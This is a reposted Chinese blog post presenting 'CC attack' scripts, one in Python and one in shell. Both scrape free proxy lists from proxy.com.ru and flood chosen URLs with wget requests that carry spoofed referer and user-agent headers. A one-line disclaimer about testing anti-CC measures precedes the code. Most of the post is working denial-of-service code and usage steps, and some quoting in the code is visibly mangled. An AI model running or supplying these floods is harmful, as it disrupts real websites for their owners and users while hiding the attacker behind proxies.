码迷,mamicode.com
首页 > 系统相关 > 详细

Linux CC攻击脚本

时间:2014-08-26 17:47:57      阅读:510      评论:0      收藏:0      [点我收藏+]

标签:cc攻击脚本

CC(ChallengeCollapsar)主要是用来攻击页面的。大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,访问的人越多,论坛的页面越多,数据库就越大,被访问的频率也越高,占用的系统资源也就相当可观。


    最近在做一些防CC的措施,想验证效果就的有类似CC的攻击,所以写了个Python脚本来模拟CC攻击,其原理很简单,就是去网络上拉取一下渣渣代理,然后通过代理去访问服务器,成本低的吓人,但影响却不小...代码如下(该脚本只能用于交流学习,一切因该脚本产生的不良后果,与我无关):

#!/usr/bin/python
#-------------------------------------------------------------------------------
# Name:        CC.py
#
# Author:      LiuSha
#
# Created:     1/07/2014
# Email:       itchenyi@gmail.com
#-------------------------------------------------------------------------------

import urllib2
import re
import os
import threading
import time
import random

class RunCC(threading.Thread):
    def __init__(self,proxy,url):
        threading.Thread.__init__(self)
        self.thread_proxy = proxy
        self.thread_url = url
        self.thread_stop = False

    def run(self):
        while not self.thread_stop:
            os.system("""wget --ignore-length --cache=off --no-http-keep-alive -t 1 --referer="http://www.10086.com" -U ‘Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)‘ -e "http_proxy=http://%s/" "%s" &"""%(self.thread_proxy,self.thread_url))
    def stop(self):
        self.thread_stop = True
        
        

def get_stock_html(URL): 
    opener = urllib2.build_opener(
        urllib2.HTTPRedirectHandler(),
        urllib2.HTTPHandler(debuglevel=0),
        )
    opener.addheaders = [
        (‘User-agent‘,
         ‘Mozilla/4.0 (compatible;MSIE 7.0;‘
         ‘Windows NT 5.1; .NET CLR 2.0.50727;‘
         ‘.NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)‘)
         ]
    url = "http://proxy.com.ru/%s"%URL
    response = opener.open(url)
    return ‘‘.join(response.readlines())

def Getting_Url():
    global CC_Url
    file = open(‘url‘,‘r‘)
    CC_Url = file.readlines()
    file.close()

def Getting_list():
    global IP_Port
    IP_Port = []
    for html_list in re.findall(‘list_\d+.html‘,get_stock_html("list_1.html")):
        print "getting %s‘s IP:PORT"%html_list
        IP_Port += eval(re.sub(‘‘,‘:‘,"%s"%re.findall(‘\d+.\d+.\d+.\d+\d+‘,get_stock_html(html_list))))
        
def main():
    global CC_Dict
    CC_Dict = {}
    for i_name in range(len(IP_Port)):
        CC_Dict[‘Thread%s‘%i_name] = "RunCC(‘%s‘,r‘‘‘%s‘‘‘)"%(IP_Port[i_name],random.choice(CC_Url))
    for k,v in CC_Dict.items():
        k = eval(v)
        k.start()
        time.sleep(0.6)
        k.stop()
        
if __name__ == ‘__main__‘:
    Getting_Url()
    Getting_list()
    main()

  使用方法:

###url 文件一行一个url不嫌多###
[root@test-CC CC]# cat url 
http://www.ipython.me/about-me
http://www.ipython.me/
###直接运行###
[root@test-CC CC]# python cc.py

  帅气的大飞哥也用shell 粗暴的写了一个出来,代码如下:

#!/bin/sh
#Email : zhengxiaofeiccc@139.com
url=$1
page_number=`curl http://proxy.com.ru |grep -o "list_.*html"|awk -F "‘" ‘{print $NF}‘|tail -1|grep -o \[0-9\]*`

for i in `seq 1 $page_number`
do
curl  http://proxy.com.ru/list_$i.html|egrep -o "[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}.*[0-9]{2,4}"|awk -F "<|>" ‘{print $1,$NF}‘ >> ip.txt
done

while read ip port
do
wget  -b  --cache=off --ignore-length --referer="http://www.10086.com" -U ‘Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)‘ -Y on -e "http_proxy=http://$ip:$port/" "$url"
done < ip.txt

本文出自 “IT辰逸” 博客,请务必保留此出处http://itchenyi.blog.51cto.com/4745638/1545085

Linux CC攻击脚本

标签:cc攻击脚本

原文地址:http://itchenyi.blog.51cto.com/4745638/1545085

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!